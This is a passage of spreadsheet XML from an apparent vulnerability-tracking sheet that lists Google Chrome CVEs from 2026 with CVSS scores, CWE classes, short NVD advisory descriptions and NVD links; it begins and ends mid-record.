          <t>CVE-2026-87473</t>
        </is>
      </c>
      <c r="D758" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E758" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F758" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G758" s="5" t="inlineStr"/>
      <c r="H758" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I758" s="5" t="inlineStr"/>
      <c r="J758" s="5" t="inlineStr"/>
      <c r="K758" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L758" s="5" t="inlineStr"/>
      <c r="M758" s="5" t="inlineStr"/>
      <c r="N758" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O758" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P758" s="5" t="inlineStr"/>
      <c r="Q758" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R758" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in FileHandling in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87473</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87475</t>
        </is>
      </c>
      <c r="D759" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E759" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F759" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G759" s="5" t="inlineStr"/>
      <c r="H759" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I759" s="5" t="inlineStr"/>
      <c r="J759" s="5" t="inlineStr"/>
      <c r="K759" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L759" s="5" t="inlineStr"/>
      <c r="M759" s="5" t="inlineStr"/>
      <c r="N759" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O759" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P759" s="5" t="inlineStr"/>
      <c r="Q759" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R759" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Omnibox in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions into a privileged page via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87475</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87476</t>
        </is>
      </c>
      <c r="D760" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E760" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F760" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G760" s="5" t="inlineStr"/>
      <c r="H760" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I760" s="5" t="inlineStr"/>
      <c r="J760" s="5" t="inlineStr"/>
      <c r="K760" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L760" s="5" t="inlineStr"/>
      <c r="M760" s="5" t="inlineStr"/>
      <c r="N760" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O760" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P760" s="5" t="inlineStr"/>
      <c r="Q760" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R760" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Loader in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87476</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87477</t>
        </is>
      </c>
      <c r="D761" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E761" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F761" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G761" s="5" t="inlineStr"/>
      <c r="H761" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I761" s="5" t="inlineStr"/>
      <c r="J761" s="5" t="inlineStr"/>
      <c r="K761" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L761" s="5" t="inlineStr"/>
      <c r="M761" s="5" t="inlineStr"/>
      <c r="N761" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O761" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P761" s="5" t="inlineStr"/>
      <c r="Q761" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R761" s="5" t="inlineStr">
        <is>
          <t>Information leak in Core in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to leak sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87477</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87478</t>
        </is>
      </c>
      <c r="D762" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E762" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F762" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G762" s="5" t="inlineStr"/>
      <c r="H762" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I762" s="5" t="inlineStr"/>
      <c r="J762" s="5" t="inlineStr"/>
      <c r="K762" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L762" s="5" t="inlineStr"/>
      <c r="M762" s="5" t="inlineStr"/>
      <c r="N762" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O762" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P762" s="5" t="inlineStr"/>
      <c r="Q762" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="R762" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in Autofill in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87478</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87483</t>
        </is>
      </c>
      <c r="D763" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E763" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F763" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G763" s="5" t="inlineStr"/>
      <c r="H763" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I763" s="5" t="inlineStr"/>
      <c r="J763" s="5" t="inlineStr"/>
      <c r="K763" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L763" s="5" t="inlineStr"/>
      <c r="M763" s="5" t="inlineStr"/>
      <c r="N763" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O763" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P763" s="5" t="inlineStr"/>
      <c r="Q763" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R763" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Browser in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87483</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87490</t>
        </is>
      </c>
      <c r="D764" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E764" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F764" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G764" s="5" t="inlineStr"/>
      <c r="H764" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I764" s="5" t="inlineStr"/>
      <c r="J764" s="5" t="inlineStr"/>
      <c r="K764" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L764" s="5" t="inlineStr"/>
      <c r="M764" s="5" t="inlineStr"/>
      <c r="N764" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O764" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P764" s="5" t="inlineStr"/>
      <c r="Q764" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R764" s="5" t="inlineStr">
        <is>
          <t>Information leak in Transactions Platform in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87490</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87493</t>
        </is>
      </c>
      <c r="D765" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E765" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F765" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G765" s="5" t="inlineStr"/>
      <c r="H765" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I765" s="5" t="inlineStr"/>
      <c r="J765" s="5" t="inlineStr"/>
      <c r="K765" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L765" s="5" t="inlineStr"/>
      <c r="M765" s="5" t="inlineStr"/>
      <c r="N765" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O765" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P765" s="5" t="inlineStr"/>
      <c r="Q765" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R765" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87493</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87503</t>
        </is>
      </c>
      <c r="D766" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E766" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F766" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G766" s="5" t="inlineStr"/>
      <c r="H766" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I766" s="5" t="inlineStr"/>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L766" s="5" t="inlineStr"/>
      <c r="M766" s="5" t="inlineStr"/>
      <c r="N766" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O766" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P766" s="5" t="inlineStr"/>
      <c r="Q766" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="R766" s="5" t="inlineStr">
        <is>
          <t>Inappropriate implementation in Downloads in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87503</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87513</t>
        </is>
      </c>
      <c r="D767" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E767" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F767" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G767" s="5" t="inlineStr"/>
      <c r="H767" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I767" s="5" t="inlineStr"/>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L767" s="5" t="inlineStr"/>
      <c r="M767" s="5" t="inlineStr"/>
      <c r="N767" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O767" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P767" s="5" t="inlineStr"/>
      <c r="Q767" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R767" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in ControlledFrame in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87513</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87515</t>
        </is>
      </c>
      <c r="D768" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E768" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F768" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G768" s="5" t="inlineStr"/>
      <c r="H768" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I768" s="5" t="inlineStr"/>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L768" s="5" t="inlineStr"/>
      <c r="M768" s="5" t="inlineStr"/>
      <c r="N768" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O768" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P768" s="5" t="inlineStr"/>
      <c r="Q768" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R768" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in FileAPI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87515</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87519</t>
        </is>
      </c>
      <c r="D769" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E769" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F769" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G769" s="5" t="inlineStr"/>
      <c r="H769" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I769" s="5" t="inlineStr"/>
      <c r="J769" s="5" t="inlineStr"/>
      <c r="K769" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L769" s="5" t="inlineStr"/>
      <c r="M769" s="5" t="inlineStr"/>
      <c r="N769" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O769" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P769" s="5" t="inlineStr"/>
      <c r="Q769" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R769" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Safebrowsing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87519</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87522</t>
        </is>
      </c>
      <c r="D770" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E770" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F770" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G770" s="5" t="inlineStr"/>
      <c r="H770" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I770" s="5" t="inlineStr"/>
      <c r="J770" s="5" t="inlineStr"/>
      <c r="K770" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L770" s="5" t="inlineStr"/>
      <c r="M770" s="5" t="inlineStr"/>
      <c r="N770" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O770" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P770" s="5" t="inlineStr"/>
      <c r="Q770" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R770" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in WebView in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially bypass system access restrictions via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87522</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87532</t>
        </is>
      </c>
      <c r="D771" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E771" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F771" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G771" s="5" t="inlineStr"/>
      <c r="H771" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I771" s="5" t="inlineStr"/>
      <c r="J771" s="5" t="inlineStr"/>
      <c r="K771" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L771" s="5" t="inlineStr"/>
      <c r="M771" s="5" t="inlineStr"/>
      <c r="N771" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O771" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P771" s="5" t="inlineStr"/>
      <c r="Q771" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="R771" s="5" t="inlineStr">
        <is>
          <t>Improper state validation in Safebrowsing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87532</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87535</t>
        </is>
      </c>
      <c r="D772" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E772" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F772" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G772" s="5" t="inlineStr"/>
      <c r="H772" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I772" s="5" t="inlineStr"/>
      <c r="J772" s="5" t="inlineStr"/>
      <c r="K772" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="L772" s="5" t="inlineStr"/>
      <c r="M772" s="5" t="inlineStr"/>
      <c r="N772" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O772" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P772" s="5" t="inlineStr"/>
      <c r="Q772" s="5" t="inlineStr">
        <is>
          <t>CWE-221</t>
        </is>
      </c>
      <c r="R772" s="5" t="inlineStr">
        <is>
          <t>Information loss or omission in Safebrowsing in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87535</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87541</t>
        </is>
      </c>
      <c r="D773" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E773" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G773" s="5" t="inlineStr"/>
      <c r="H773" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I773" s="5" t="inlineStr"/>
      <c r="J773" s="5" t="inlineStr"/>
      <c r="K773" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L773" s="5" t="inlineStr"/>
      <c r="M773" s="5" t="inlineStr"/>
      <c r="N773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O773" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P773" s="5" t="inlineStr"/>
      <c r="Q773" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R773" s="5" t="inlineStr">
        <is>
          <t>Information leak in Navigation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87541</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87545</t>
        </is>
      </c>
      <c r="D774" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E774" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F774" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G774" s="5" t="inlineStr"/>
      <c r="H774" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I774" s="5" t="inlineStr"/>
      <c r="J774" s="5" t="inlineStr"/>
      <c r="K774" s="5" t="inlineStr">
        <is>
          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="L774" s="5" t="inlineStr"/>
      <c r="M774" s="5" t="inlineStr"/>
      <c r="N774" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O774" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P774" s="5" t="inlineStr"/>
      <c r="Q774" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R774" s="5" t="inlineStr">
        <is>
          <t>Information leak in Mobile in Google Chrome on on iOS prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to leak sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87545</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87549</t>
        </is>
      </c>
      <c r="D775" s="5" t="n">
